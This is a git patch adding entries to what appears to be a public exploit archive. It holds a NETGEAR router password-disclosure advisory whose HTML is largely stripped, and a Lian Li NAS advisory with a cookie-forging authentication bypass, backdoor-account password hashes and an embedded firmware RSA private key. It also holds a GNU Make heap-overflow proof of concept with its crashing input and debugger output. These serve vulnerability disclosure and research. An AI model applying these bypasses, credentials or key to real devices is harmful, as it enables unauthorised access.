From 0cca3dcc6f9e046b80c4122a0e0584fddbccad4f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 26 Jul 2014 04:37:24 +0000 Subject: [PATCH] Updated 07_26_2014 --- files.csv | 17 +- platforms/hardware/webapps/34149.txt | 827 +++++++++++++++++++++++++++ platforms/hardware/webapps/34163.txt | 327 +++++++++++ platforms/linux/dos/34164.pl | 182 ++++++ platforms/multiple/webapps/34165.txt | 92 +++ platforms/php/remote/34160.txt | 293 ++++++++++ platforms/php/webapps/34157.txt | 11 + platforms/php/webapps/34159.txt | 10 + platforms/php/webapps/34161.txt | 98 ++++ platforms/windows/dos/34151.txt | 9 + platforms/windows/dos/34158.txt | 9 + platforms/windows/dos/34162.py | 55 ++ 12 files changed, 1927 insertions(+), 3 deletions(-) create mode 100755 platforms/hardware/webapps/34149.txt create mode 100755 platforms/hardware/webapps/34163.txt create mode 100755 platforms/linux/dos/34164.pl create mode 100755 platforms/multiple/webapps/34165.txt create mode 100755 platforms/php/remote/34160.txt create mode 100755 platforms/php/webapps/34157.txt create mode 100755 platforms/php/webapps/34159.txt create mode 100755 platforms/php/webapps/34161.txt create mode 100755 platforms/windows/dos/34151.txt create mode 100755 platforms/windows/dos/34158.txt create mode 100755 platforms/windows/dos/34162.py diff --git a/files.csv b/files.csv index 3b5b27292..e1a102d7f 100755 --- a/files.csv +++ b/files.csv @@ -17504,7 +17504,7 @@ id,file,description,date,author,platform,type,port 20201,platforms/linux/local/20201.c,"Nvidia Linux Driver Privilege Escalation",2012-08-02,anonymous,linux,local,0 20202,platforms/windows/remote/20202.rb,"Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow",2012-08-03,metasploit,windows,remote,0 20204,platforms/windows/remote/20204.rb,"Dell SonicWALL Scrutinizer 9 SQL Injection",2012-08-03,metasploit,windows,remote,0 -20205,platforms/unix/remote/20205.rb,"Zenoss 3 showDaemonXMLConfig Command Execution",2012-08-03,metasploit,unix,remote,8080 +20205,platforms/unix/remote/20205.rb,"Zenoss 3 - showDaemonXMLConfig Command Execution",2012-08-03,metasploit,unix,remote,8080 20206,platforms/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B Arbitrary File Access",2000-09-01,neonbunny,multiple,remote,0 20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B .photon Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0 20208,platforms/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal vulnerability",2000-09-07,pestilence,php,webapps,0 @@ -30190,7 +30190,7 @@ id,file,description,date,author,platform,type,port 33508,platforms/linux/local/33508.txt,"GNU Bash <= 4.0 'ls' Control Character Command Injection Vulnerability",2010-01-13,"Eric Piel",linux,local,0 33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0 33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0 -33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0 +33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0 33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80 33516,platforms/linux/local/33516.txt,"Linux kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0 33518,platforms/hardware/webapps/33518.txt,"Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 @@ -30209,7 +30209,7 @@ id,file,description,date,author,platform,type,port 33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl ActiveX Control 'ViewProfile' Method Heap Buffer Overflow Vulnerability",2010-01-18,karak0rsan,windows,dos,0 33534,platforms/php/webapps/33534.txt,"TestLink <= 1.8.5 'order_by_login_dir' Parameter Cross Site Scripting Vulnerability",2010-01-18,"Prashant Khandelwal",php,webapps,0 33535,platforms/linux/remote/33535.txt,"SystemTap 1.0 'stat-server' Remote Arbitrary Command Injection Vulnerability",2010-01-15,"Frank Ch. Eigler",linux,remote,0 -33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0 +33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 - Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0 33538,platforms/windows/remote/33538.py,"Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow",2014-05-27,superkojiman,windows,remote,21 33540,platforms/windows/remote/33540.txt,"SurgeFTP 2.x 'surgeftpmgr.cgi' Multiple Cross Site Scripting Vulnerabilities",2010-01-18,indoushka,windows,remote,0 33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 engine/inc/include/init.php selected_language Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 @@ -30756,8 +30756,19 @@ id,file,description,date,author,platform,type,port 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0 34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0 34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0 +34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure vulnerability",2014-07-23,"Dolev Farhi",hardware,webapps,0 +34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution Vulnerability",2010-06-16,h07,windows,dos,0 34152,platforms/linux/remote/34152.txt,"CUPS <= 1.4.2 Web Interface Information Disclosure Vulnerability",2010-06-15,"Luca Carettoni",linux,remote,0 34153,platforms/php/webapps/34153.txt,"2daybiz Network Community Script SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0 34154,platforms/php/webapps/34154.txt,"Software Index 'signinform.php' Cross-Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0 34155,platforms/php/webapps/34155.txt,"Ceica-GW 'login.php' Cross Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0 34156,platforms/windows/remote/34156.pl,"TurboFTP Server <= 1.20.745 Directory Traversal Vulnerability",2010-06-17,leinakesi,windows,remote,0 +34157,platforms/php/webapps/34157.txt,"Firebook Multiple Cross Site Scripting and Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0 +34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service Vulnerability",2010-06-17,"Luigi Auriemma",windows,dos,0 +34159,platforms/php/webapps/34159.txt,"Gallery XML Joomla! Component 1.1 SQL Injection and Local File Include Vulnerabilities",2010-06-18,jdc,php,webapps,0 +34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution Exploit",2014-07-24,LiquidWorm,php,remote,80 +34161,platforms/php/webapps/34161.txt,"Wordpress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 +34162,platforms/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",windows,dos,0 +34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0 +34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow PoC",2014-07-24,HyP,linux,dos,0 +34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 64bit - Stored XSS",2014-07-25,"Dolev Farhi",multiple,webapps,0 diff --git a/platforms/hardware/webapps/34149.txt b/platforms/hardware/webapps/34149.txt new file mode 100755 index 000000000..81df78f7b --- /dev/null +++ b/platforms/hardware/webapps/34149.txt @@ -0,0 +1,827 @@ +# Exploit Title: Password Disclosure vulnerability +# Software: NETGEAR DGN2200 +# Software Link: netgear.com +# Version: DGN2200 +# Author: Dolev Farhi, email: dolev(at)openflare(dot)org +# Date: 23.7.2014 +# Tested on: Kali Linux +# Firmware 1.0.0.29_1.7.29_HotS + + +2. Vulnerability Description: +=============================== +An attacker is able to extract sensitive information such as the password from the Basic Settings router page due to storing it in plaintext. + + +3. Steps to reproduce: +====================== +Navigate to the Basic Settings page, right click in the browser -> view source/frame + +html> + + + + + + + + +PPPoE + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

Basic Settings

+ +
+

Does Your Internet Connection Require A Login?

+ Yes
+ No
Encapsulation
Login
Password
Service Name (If Required)
Idle Timeout (In Minutes)
Internet IP Address
Get Dynamically From ISP
Use Static IP Address + . + . + . +
Domain Name Server (DNS) Address
Get Automatically From ISP
Use These DNS Servers
Primary DNS + . + . + . +
Secondary DNS + . + . + . +
NAT (Network Address Translation)
+ Enable + Disable + Bridge +
+ + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+

+ + + + diff --git a/platforms/hardware/webapps/34163.txt b/platforms/hardware/webapps/34163.txt new file mode 100755 index 000000000..e3650cbf2 --- /dev/null +++ b/platforms/hardware/webapps/34163.txt @@ -0,0 +1,327 @@ +# Exploit Title: Lian Li NAS Multiple vulnerabilities +# Date: 21/07/2014 +# Exploit Author: pws +# Vendor Homepage: http://www.lian-li.com/en/dt_portfolio_category/nas/ +# Firmware Link: https://www.dropbox.com/s/imvkndl8m5yj7qp/G5S604121826700.tar.gz +# Tested on: Latest version +# CVE : None yet + +1. Hardcoded cookie to access the admin section + +File: /javascript/storlib.js +function get_cookie() +{ + var allcookies = document.cookie; + var pos = allcookies.indexOf("LoginUser=admin"); + if (pos == -1) + location = "/index.html"; +} + +2. Authentication bypass + +Create such cookie: 'LoginUser=admin' (document.cookie='LoginUser=admin'). +Then, access the URL directly to get admin features. + +Eg. +http://192.168.1.1/cgi/telnet/telnet.cgi # enable/disable the Telnet server +http://192.168.1.1/cgi/user/user.cgi # manage users (change passwords, add user, ...) + +Here are all the cgi's accessible (firmware: G5S604121826700) : + +cgi/lan/lan.cgi +cgi/lan/lan_nasHandler.cgi +cgi/lan/lan_routerHandler.cgi +cgi/information/information.cgi +cgi/return/return.cgi +cgi/account/account.cgi +cgi/account/accountHandler.cgi +cgi/lang/lang.cgi +cgi/lang/langHandler.cgi +cgi/backup/clear.cgi +cgi/backup/fixed.cgi +cgi/backup/ipaddress.cgi +cgi/backup/listing.cgi +cgi/backup/s.cgi +cgi/backup/schedule.cgi +cgi/backup/source.cgi +cgi/backup/dd_schedule.cgi +cgi/backup/decide.cgi +cgi/backup/ipaddress1.cgi +cgi/backup/s1.cgi +cgi/backup/source1.cgi +cgi/backup/ipaddress2.cgi +cgi/backup/s2.cgi +cgi/backup/source2.cgi +cgi/backup/ipaddress3.cgi +cgi/backup/s3.cgi +cgi/backup/source3.cgi +cgi/backup/ipaddress5.cgi +cgi/backup/s5.cgi +cgi/backup/source5.cgi +cgi/backup/l.cgi +cgi/backup/listing1.cgi +cgi/backup/listing2.cgi +cgi/backup/listing3.cgi +cgi/backup/listing5.cgi +cgi/backup/email.cgi +cgi/backup/email1.cgi +cgi/backup/fixed1.cgi +cgi/backup/schedule1.cgi +cgi/backup/email2.cgi +cgi/backup/fixed2.cgi +cgi/backup/schedule2.cgi +cgi/backup/email3.cgi +cgi/backup/fixed3.cgi +cgi/backup/schedule3.cgi +cgi/backup/dd_schedule1.cgi +cgi/backup/dd_schedule2.cgi +cgi/backup/dd_schedule3.cgi +cgi/backup/dd_schedule5.cgi +cgi/backup/email5.cgi +cgi/backup/fixed5.cgi +cgi/backup/schedule5.cgi +cgi/backup/fixed6.cgi +cgi/backup/ipaddress6.cgi +cgi/backup/listing6.cgi +cgi/backup/s6.cgi +cgi/backup/email6.cgi +cgi/backup/schedule6.cgi +cgi/backup/source6.cgi +cgi/backup/dd_schedule6.cgi +cgi/backup/fixed4.cgi +cgi/backup/ipaddress4.cgi +cgi/backup/listing4.cgi +cgi/backup/s4.cgi +cgi/backup/email4.cgi +cgi/backup/schedule4.cgi +cgi/backup/source4.cgi +cgi/backup/dd_schedule4.cgi +cgi/backup/emessage.cgi +cgi/backup/emessage_fail.cgi +cgi/group/group.cgi +cgi/group/groupHandler.cgi +cgi/group/groupDeleteHandler.cgi +cgi/group/groupMembers.cgi +cgi/group/groupMembersHandler.cgi +cgi/user/user.cgi +cgi/user/userHandler.cgi +cgi/user/userDeleteHandler.cgi +cgi/user/userMembership.cgi +cgi/user/userMembershipHandler.cgi +cgi/time/time.cgi +cgi/time/timeHandler.cgi +cgi/power/power.cgi +cgi/power/powerHandler.cgi +cgi/factoryReset/factoryReset.cgi +cgi/factoryReset/factoryResetHandler.cgi +cgi/restoreConfig/restoreConfig.cgi +cgi/restoreConfig/restoreConfigHandler.cgi +cgi/saveConfig/saveConfig.cgi +cgi/saveConfig/saveConfigHandler.cgi +cgi/diskUsage/diskUsage.cgi +cgi/diskUsage/diskUsageuser.cgi +cgi/diskUsage/diskUsageHandler.cgi +cgi/diskUsage/diskUsageuserHandler.cgi +cgi/diskUtility/diskUtility.cgi +cgi/diskUtility/diskUtilityHandler.cgi +cgi/diskUtility/healthReport.cgi +cgi/dhcpserver/dhcpserver.cgi +cgi/dhcpserver/dhcpserverHandler.cgi +cgi/dhcpserver/dhcplease.cgi +cgi/dhcpserver/dhcpleaseHandler.cgi +cgi/dhcpserver/dhcpstatic.cgi +cgi/dhcpserver/dhcpstaticHandler.cgi +cgi/dhcpserver/staticipDeleteHandler.cgi +cgi/errorAlert/errorAlert.cgi +cgi/errorAlert/errorAlertHandler.cgi +cgi/share/share.cgi +cgi/share/shareHandler.cgi +cgi/share/shareDeleteHandler.cgi +cgi/share/share_nonLinux.cgi +cgi/share/share_nonLinuxHandler.cgi +cgi/share/share_Linux.cgi +cgi/share/share_LinuxHandler.cgi +cgi/fileServer/fileServer.cgi +cgi/fileServer/fileServerHandler.cgi +cgi/log_system/log_system.cgi +cgi/log_system/log_systemHandler.cgi +cgi/log_admin/log_admin.cgi +cgi/log_admin/log_adminHandler.cgi +cgi/log_dhcp/log_dhcp.cgi +cgi/log_dhcp/log_dhcpHandler.cgi +cgi/log_ftp/log_ftp.cgi +cgi/log_ftp/log_ftpHandler.cgi +cgi/log_samba/log_samba.cgi +cgi/log_samba/log_sambaHandler.cgi +cgi/printer/printer.cgi +cgi/printer/printerHandler.cgi +cgi/upgrade2/upgrade.cgi +cgi/upgrade2/upgradeHandler.cgi +cgi/wizard/wizard.cgi +cgi/wizard/language.cgi +cgi/wizard/languageHandler.cgi +cgi/wizard/password.cgi +cgi/wizard/passwordHandler.cgi +cgi/wizard/hostname.cgi +cgi/wizard/hostnameHandler.cgi +cgi/wizard/tcpip.cgi +cgi/wizard/tcpipHandler.cgi +cgi/wizard/time.cgi +cgi/wizard/timeHandler.cgi +cgi/wizard/confirm.cgi +cgi/wizard/confirmHandler.cgi +cgi/wizard/addUser.cgi +cgi/wizard/user.cgi +cgi/wizard/userHandler.cgi +cgi/wizard/userMembership.cgi +cgi/wizard/userMembershipHandler.cgi +cgi/wizard/userSharePermission.cgi +cgi/wizard/userSharePermissionHandler.cgi +cgi/wizard/addGroup.cgi +cgi/wizard/group.cgi +cgi/wizard/groupHandler.cgi +cgi/wizard/groupMembers.cgi +cgi/wizard/groupMembersHandler.cgi +cgi/wizard/groupSharePermission.cgi +cgi/wizard/groupSharePermissionHandler.cgi +cgi/wizard/addShare.cgi +cgi/wizard/share.cgi +cgi/wizard/shareHandler.cgi +cgi/wizard/sharePermission.cgi +cgi/wizard/sharePermissionHandler.cgi +cgi/wizard/nfsPermission.cgi +cgi/wizard/nfsPermissionHandler.cgi +cgi/wizard/button.cgi +cgi/telnet/telnet.cgi +cgi/telnet/telnetHandler.cgi +cgi/bonjour/bonjour.cgi +cgi/bonjour/bonjourHandler.cgi +cgi/raid/raid.cgi +cgi/raid/raidHandler.cgi +cgi/swupdate/swupdate.cgi +cgi/swupdate/swupdateHandler.cgi +cgi/swupdate/installHandler.cgi +cgi/swupdate/swlist.cgi +cgi/swupdate/swlistHandler.cgi + +All forms on those cgi pages can be used to perform CSRF attacks (to target internal network for example). + +3. Backdoored accounts + +Some users are not referenced in the management page but are present in the system. +Moreover, the robustness of such passwords is really poor (password = "123456"): + +mysql:$1$$RmyPVMlhpXjJj8iv4w.Ul.:6000:6000:Linux User,,,:/home/mysql:/bin/sh +daemon:$1$$RmyPVMlhpXjJj8iv4w.Ul.:7000:7000:Linux User,,,:/home/daemon:/bin/sh + +4. Privilege escalation "scenario" + +Enable Telnet server (if disabled) +Connect to it using one of the backdoored accounts and retrieve /etc/passwd file. +It contains passwords for all accounts. + +5. Certificate used by the FTP server stored in the firmware + +cacert.pem + +subject=/C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server +issuer= /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA +-----BEGIN X509 CERTIFICATE----- + +MIIBgjCCASwCAQQwDQYJKoZIhvcNAQEEBQAwODELMAkGA1UEBhMCQVUxDDAKBgNV +BAgTA1FMRDEbMBkGA1UEAxMSU1NMZWF5L3JzYSB0ZXN0IENBMB4XDTk1MTAwOTIz +MzIwNVoXDTk4MDcwNTIzMzIwNVowYDELMAkGA1UEBhMCQVUxDDAKBgNVBAgTA1FM +RDEZMBcGA1UEChMQTWluY29tIFB0eS4gTHRkLjELMAkGA1UECxMCQ1MxGzAZBgNV +BAMTElNTTGVheSBkZW1vIHNlcnZlcjBcMA0GCSqGSIb3DQEBAQUAA0sAMEgCQQC3 +LCXcScWua0PFLkHBLm2VejqpA1F4RQ8q0VjRiPafjx/Z/aWH3ipdMVvuJGa/wFXb +/nDFLDlfWp+oCPwhBtVPAgMBAAEwDQYJKoZIhvcNAQEEBQADQQArNFsihWIjBzb0 +DCsU0BvL2bvSwJrPEqFlkDq3F4M6EGutL9axEcANWgbbEdAvNJD1dmEmoWny27Pn +IMs6ZOZB +-----END X509 CERTIFICATE----- + +server-cert.pem + +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 1 (0x1) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=TW, ST=Taipei, O=Storm, OU=software, CN=aaron/emailAddress=aaron@storlinksemi.com + Validity + Not Before: Jan 3 00:46:50 2007 GMT + Not After : Jan 3 00:46:50 2008 GMT + Subject: C=TW, ST=Taipei, L=Hsinchu, O=Storm, OU=software, CN=aaron/emailAddress=aaron@storlinksemi.com + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + RSA Public Key: (1024 bit) + Modulus (1024 bit): + 00:c4:1d:89:dc:9b:45:6c:96:e2:ad:e6:98:13:25: + 64:b4:54:f6:e4:97:74:d5:9f:15:1e:1d:45:a1:75: + 45:fc:3b:2b:9c:dd:e6:0d:34:4b:d7:6c:8d:d0:32: + 5f:39:25:ab:53:81:de:84:17:cf:27:0a:c2:26:82: + 9f:09:3f:a8:7e:8c:31:c3:fe:43:75:fe:1f:53:8e: + 74:0e:31:d2:55:71:51:1b:7a:01:e3:57:4f:f7:d6: + 9f:1d:39:19:42:3c:a1:bd:08:d1:99:69:fc:1c:34: + 6e:0f:fb:a7:36:f5:77:bf:95:c8:1d:50:30:25:59: + 23:39:d3:27:5a:06:0a:05:6d + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Comment: + OpenSSL Generated Certificate + X509v3 Subject Key Identifier: + 61:19:1F:04:38:83:83:E0:CD:6A:8C:CA:F9:9C:6E:D3:7F:C5:55:C3 + X509v3 Authority Key Identifier: + keyid:F6:E9:49:A1:24:01:C1:0A:4C:7F:6A:E7:58:B8:95:BC:AF:95:B4:F7 + DirName:/C=TW/ST=Taipei/O=Storm/OU=software/CN=aaron/emailAddress=aaron@storlinksemi.com + serial:00 + + Signature Algorithm: sha1WithRSAEncryption + 5b:b7:dc:28:58:5e:53:c5:d7:88:be:71:21:43:b5:db:a1:d7: + fc:de:38:1d:38:e7:b3:a4:a5:64:92:1b:67:1b:c8:3e:0f:a9: + 16:77:0c:0b:bf:e9:d2:b5:70:cd:05:71:df:1a:db:2a:c8:56: + 5d:91:1c:ef:2b:16:b3:f0:55:89:ba:35:e4:ae:07:6c:4a:c5: + d0:0d:e3:1b:1d:5e:fd:01:b2:52:0e:fe:05:08:ed:40:26:e6: + b0:2b:24:2f:0d:42:11:f0:d9:b4:6d:db:ce:d1:b1:65:77:62: + 7a:06:8b:09:c7:33:f3:43:13:a7:33:47:af:5c:6a:39:4e:8f: + 64:5c +-----BEGIN CERTIFICATE----- +MIIDezCCAuSgAwIBAgIBATANBgkqhkiG9w0BAQUFADB4MQswCQYDVQQGEwJUVzEP +MA0GA1UECBMGVGFpcGVpMQ4wDAYDVQQKEwVTdG9ybTERMA8GA1UECxMIc29mdHdh +cmUxDjAMBgNVBAMTBWFhcm9uMSUwIwYJKoZIhvcNAQkBFhZhYXJvbkBzdG9ybGlu +a3NlbWkuY29tMB4XDTA3MDEwMzAwNDY1MFoXDTA4MDEwMzAwNDY1MFowgYoxCzAJ +BgNVBAYTAlRXMQ8wDQYDVQQIEwZUYWlwZWkxEDAOBgNVBAcTB0hzaW5jaHUxDjAM +BgNVBAoTBVN0b3JtMREwDwYDVQQLEwhzb2Z0d2FyZTEOMAwGA1UEAxMFYWFyb24x +JTAjBgkqhkiG9w0BCQEWFmFhcm9uQHN0b3JsaW5rc2VtaS5jb20wgZ8wDQYJKoZI +hvcNAQEBBQADgY0AMIGJAoGBAMQdidybRWyW4q3mmBMlZLRU9uSXdNWfFR4dRaF1 +Rfw7K5zd5g00S9dsjdAyXzklq1OB3oQXzycKwiaCnwk/qH6MMcP+Q3X+H1OOdA4x +0lVxURt6AeNXT/fWnx05GUI8ob0I0Zlp/Bw0bg/7pzb1d7+VyB1QMCVZIznTJ1oG +CgVtAgMBAAGjggEAMIH9MAkGA1UdEwQCMAAwLAYJYIZIAYb4QgENBB8WHU9wZW5T +U0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQWBBRhGR8EOIOD4M1qjMr5 +nG7Tf8VVwzCBogYDVR0jBIGaMIGXgBT26UmhJAHBCkx/audYuJW8r5W096F8pHow +eDELMAkGA1UEBhMCVFcxDzANBgNVBAgTBlRhaXBlaTEOMAwGA1UEChMFU3Rvcm0x +ETAPBgNVBAsTCHNvZnR3YXJlMQ4wDAYDVQQDEwVhYXJvbjElMCMGCSqGSIb3DQEJ +ARYWYWFyb25Ac3RvcmxpbmtzZW1pLmNvbYIBADANBgkqhkiG9w0BAQUFAAOBgQBb +t9woWF5TxdeIvnEhQ7Xbodf83jgdOOezpKVkkhtnG8g+D6kWdwwLv+nStXDNBXHf +GtsqyFZdkRzvKxaz8FWJujXkrgdsSsXQDeMbHV79AbJSDv4FCO1AJuawKyQvDUIR +8Nm0bdvO0bFld2J6BosJxzPzQxOnM0evXGo5To9kXA== +-----END CERTIFICATE----- + +server-key.pem + +-----BEGIN RSA PRIVATE KEY----- +MIICXQIBAAKBgQDEHYncm0VsluKt5pgTJWS0VPbkl3TVnxUeHUWhdUX8Oyuc3eYN +NEvXbI3QMl85JatTgd6EF88nCsImgp8JP6h+jDHD/kN1/h9TjnQOMdJVcVEbegHj +V0/31p8dORlCPKG9CNGZafwcNG4P+6c29Xe/lcgdUDAlWSM50ydaBgoFbQIDAQAB +AoGBAIKcZZd99aOXbcqBm+CMc+BCAdhGInKvK0JOHnSkhQKyaZ5kjnVW0ffb/Sqe +kZqewtav1IFG1hjbamh5b++Z7N2F+jshPnacdBXrgT4PPUfj3+ZirXlyckxJv3YT +Ql1bLsaCMne2b4sUuGsldROfiXfOR5SDUhbHocQj+mj8C/OlAkEA/4TfMZJqIkAx +W7uwPqX7c6k1XhLwC5tjEkyZA3jhgLMCDzw1RGxO65haVyKm//e4f1S7ctQ/v80j +Rret0A4cnwJBAMR8CqOpKI7W4Qao2aIYmL36a9VIFWoNunlmuSUW/KiBkAGhfGBn ++VG0uueM4PdOWl0i45SyZxTiYUjxE+BSlnMCQQDp611dB3osYvIM1dVydQevCgA2 +YEXrilR3YzJNkHN5G+fNxMPLIRBa9H33+VxDRyhbQVndtNurnoQl8G+p4dFnAkA5 +Ftl4iBPyvNiROMpTYNYwjOx8Af/G2spNr90nu7AZvdt7vdIHqO42IU8VLEfJU4jJ ++vMpJ1TwKn6d1P4zdYulAkB1FPvPcRmn1P69b2tDGEeoSNbh4s7eqV7AntDGeQhp +ppiLtY+nlj+Mjs2pHLa1bRAWcQRl/GYU4rdF6Py9F/w/ +-----END RSA PRIVATE KEY----- diff --git a/platforms/linux/dos/34164.pl b/platforms/linux/dos/34164.pl new file mode 100755 index 000000000..946e632b5 --- /dev/null +++ b/platforms/linux/dos/34164.pl @@ -0,0 +1,182 @@ +=for comment +# Exploit Title: MAKE Heap Overflow - Pointer dereferencing POC (Calloc)-X86 X64 +# Date: [14.07.14] +# Exploit Author: HyP +# Vendor Homepage: http://www.gnu.org/software/make/ +# Software Link: http://ftp.gnu.org/gnu/make/ +# Version: Make 3.81 +# Tested on: linux32,64 bits (Fedora,Debian,ubuntu,Arch) +# CVE : none + +******************************************************************************************* +Special Thanks: + +kmkz +Zadyree +Sec0d Team + +******************************************************************************************* +******************************************************************************************* +32bits + + +./checksec.sh --file make +RELRO STACK CANARY NX PIE RPATH +RUNPATH FILE +No RELRO No canary found NX enabled No PIE No RPATH +No RUNPATH make + + +gdb-peda$ r `perl -e 'print "A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4'` + + +Program received signal SIGSEGV, Segmentation fault. +[----------------------------------registers-----------------------------------] +... +EAX: 0xdeadbeef +EBX: 0x807b971 --> 0x6f2e ('.o') +ECX: 0x0 +EDX: 0x1 +ESI: 0xdeadbeef +EDI: 0x0 +EBP: 0xbfffc5e8 --> 0xbfffc698 --> 0x8081de0 --> 0x0 +ESP: 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o') +EIP: 0x80548b2 (mov eax,DWORD PTR [eax]) +EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction +overflow) +[-------------------------------------code-------------------------------------] +0x80548aa: je 0x80548b8 +0x80548ac: lea esi,[esi+eiz*1+0x0] +0x80548b0: mov esi,eax +=> 0x80548b2: mov eax,DWORD PTR [eax] <------ Pointer Dereferencing +0x80548b4: test eax,eax +0x80548b6: jne 0x80548b0 +0x80548b8: cmp DWORD PTR [ebp-0x1034],0x1 +0x80548bf: mov DWORD PTR [ebp-0x10ac],edx +[------------------------------------stack-------------------------------------] +0000| 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o') +0004| 0xbfffa314 --> 0x807b971 --> 0x6f2e ('.o') +0008| 0xbfffa318 --> 0x2 +0012| 0xbfffa31c --> 0xb7ffadf8 ("symbol=%s; lookup in file=%s [%lu]\n") +0016| 0xbfffa320 --> 0x0 +0020| 0xbfffa324 --> 0x0 +0024| 0xbfffa328 --> 0x0 +0028| 0xbfffa32c --> 0x0 +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +Stopped reason: SIGSEGV +0x080548b2 in ?? () + + +Overflow code: +... +80548aa: 74 0c je 80548b8 +80548ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi +80548b0: 89 c6 mov %eax,%esi +80548b2: 8b 00 mov (%eax),%eax +80548b4: 85 c0 test %eax,%eax +80548b6: 75 f8 jne 80548b0 +... + + +gdb-peda$ x/x $eax +0x807ff68: 0x00000000 + +peda vmmap +Start End Perm Name +0x08048000 0x0806f000 r-xp /root/Desktop/RESEARCH/make_BoF/make +0x0806f000 0x08070000 rw-p /root/Desktop/RESEARCH/make_BoF/make + +0x08070000 0x08092000 rw-p [heap] // heap overflow !! + + + +******************************************************************************************* +******************************************************************************************* +64bits + + +Overflow Code : +40cc59: 74 10 je 40cc6b <__ctype_b_loc@plt+0xa52b> +40cc5b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0] +40cc60: 48 89 c3 mov rbx,rax +40cc63: 48 8b 00 mov rax,QWORD PTR [rax] // heap overflow + + +Program received signal SIGSEGV, Segmentation fault. +[----------------------------------registers-----------------------------------] +RAX: 0xdeadbeefdeadbeef +RBX: 0xdeadbeefdeadbeef +RCX: 0x4242424242424242 ('BBBBBBBB') +RDX: 0x0 +RSI: 0x7fffffff97d0 ('A' ...) +RDI: 0x7fffffffa7e2 --> 0x732e656c69666500 ('') +RBP: 0x7fffffffb930 --> 0x1 +RSP: 0x7fffffff95f0 --> 0x0 +RIP: 0x40cc63 (mov rax,QWORD PTR [rax]) +R8 : 0x4242424242424242 ('BBBBBBBB') +R9 : 0x7ffff7972440 (mov dx,WORD PTR [rsi-0x2]) +R10: 0x4242424242424242 ('BBBBBBBB') +R11: 0x7ffff799f990 --> 